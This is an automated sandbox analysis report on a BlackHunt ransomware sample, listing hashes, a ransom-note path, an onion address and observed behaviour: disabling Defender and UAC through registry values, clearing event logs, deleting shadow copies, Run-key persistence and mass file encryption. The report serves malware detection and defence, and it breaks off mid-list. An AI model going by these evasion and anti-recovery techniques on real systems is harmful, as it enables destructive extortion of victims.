Analysis
-
max time kernel
14s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:03
Static task
static1
Behavioral task
behavioral1
Sample
38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe
Resource
win10v2004-20231222-en
General
-
Target
38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe
-
Size
707KB
-
MD5
cb67b915d489f8e506f8823edde51635
-
SHA1
47131e53e4da1c881cd2251b403f263b4696aa26
-
SHA256
38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d
-
SHA512
4b8a9553e47023fd5fa3635f80beac5bba46f74428948222a078e5d028594801102ba36335e7e3181a88bfa088151b9ce20cde78a7d128ea3c613ad4e62b7cc6
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza188Zvnh:6uaTmkZJ+naie5OTamgEoKxLWvdh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7052 fsutil.exe 13584 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 13240 wevtutil.exe 9312 wevtutil.exe 1684 wevtutil.exe 14044 wevtutil.exe 7552 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6536 bcdedit.exe 10468 bcdedit.exe 11156 bcdedit.exe 13548 bcdedit.exe -
Renames multiple (1627) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10472 wbadmin.exe 13900 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\R: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\G: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\H: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\V: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\S: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\K: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\B: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\J: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\W: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\E: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\U: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\P: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\L: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\M: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\I: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\A: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\N: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\Y: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\O: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\Z: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\X: 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened (read-only) \??\F: cmd.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_signed_out.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_18.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateCCFiles_280x192.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaBrightRegular.ttf 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-default_32.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-gb\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\CIEXYZ.pf 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ar-ae\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_cancel_18.svg 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\blacklist 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\tzmappings 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\Google\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#BlackHunt_ReadMe.txt 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\#BlackHunt_Private.key 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_de.properties 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#BlackHunt_ReadMe.hta 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 64 8256 WerFault.exe 291 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10544 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7528 vssadmin.exe 6436 vssadmin.exe 6580 vssadmin.exe 11888 vssadmin.exe 6556 vssadmin.exe 10452 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13188 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ Conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 14316 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeRestorePrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeBackupPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeTakeOwnershipPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeAuditPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeSecurityPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeIncBasePriorityPrivilege 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe Token: SeBackupPrivilege 11936 wbengine.exe Token: SeRestorePrivilege 11936 wbengine.exe Token: SeSecurityPrivilege 11936 wbengine.exe Token: SeBackupPrivilege 6496 vssvc.exe Token: SeRestorePrivilege 6496 vssvc.exe Token: SeAuditPrivilege 6496 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1220 wrote to memory of 3984 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 101 PID 1220 wrote to memory of 3984 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 101 PID 1220 wrote to memory of 1676 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 100 PID 1220 wrote to memory of 1676 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 100 PID 1220 wrote to memory of 3684 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 94 PID 1220 wrote to memory of 3684 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 94 PID 1220 wrote to memory of 4264 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 95 PID 1220 wrote to memory of 4264 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 95 PID 1220 wrote to memory of 628 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 99 PID 1220 wrote to memory of 628 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 99 PID 1220 wrote to memory of 3396 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 218 PID 1220 wrote to memory of 3396 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 218 PID 1220 wrote to memory of 984 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 216 PID 1220 wrote to memory of 984 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 216 PID 1220 wrote to memory of 1784 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 102 PID 1220 wrote to memory of 1784 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 102 PID 3984 wrote to memory of 1016 3984 cmd.exe 105 PID 3984 wrote to memory of 1016 3984 cmd.exe 105 PID 3684 wrote to memory of 4260 3684 cmd.exe 124 PID 3684 wrote to memory of 4260 3684 cmd.exe 124 PID 628 wrote to memory of 2108 628 cmd.exe 103 PID 628 wrote to memory of 2108 628 cmd.exe 103 PID 4264 wrote to memory of 3816 4264 cmd.exe 106 PID 4264 wrote to memory of 3816 4264 cmd.exe 106 PID 1220 wrote to memory of 1628 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 214 PID 1220 wrote to memory of 1628 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 214 PID 1220 wrote to memory of 4392 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 212 PID 1220 wrote to memory of 4392 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 212 PID 1220 wrote to memory of 4820 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 210 PID 1220 wrote to memory of 4820 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 210 PID 1220 wrote to memory of 4980 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 209 PID 1220 wrote to memory of 4980 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 209 PID 1676 wrote to memory of 3800 1676 cmd.exe 211 PID 1676 wrote to memory of 3800 1676 cmd.exe 211 PID 1220 wrote to memory of 3044 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 207 PID 1220 wrote to memory of 3044 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 207 PID 1220 wrote to memory of 2764 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 206 PID 1220 wrote to memory of 2764 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 206 PID 1220 wrote to memory of 1804 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 204 PID 1220 wrote to memory of 1804 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 204 PID 1220 wrote to memory of 2916 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 203 PID 1220 wrote to memory of 2916 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 203 PID 1220 wrote to memory of 4520 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 111 PID 1220 wrote to memory of 4520 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 111 PID 1220 wrote to memory of 4676 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 200 PID 1220 wrote to memory of 4676 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 200 PID 1220 wrote to memory of 3608 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 199 PID 1220 wrote to memory of 3608 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 199 PID 1220 wrote to memory of 1524 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 114 PID 1220 wrote to memory of 1524 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 114 PID 1220 wrote to memory of 4324 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 197 PID 1220 wrote to memory of 4324 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 197 PID 1220 wrote to memory of 3980 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 115 PID 1220 wrote to memory of 3980 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 115 PID 1220 wrote to memory of 4672 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 117 PID 1220 wrote to memory of 4672 1220 38d364387e5fd60d9dc11b1f174a439367f949b35cb4a911e70c9ee45e998f5d.exe 117 PID 1220 wrote to memory of 4836 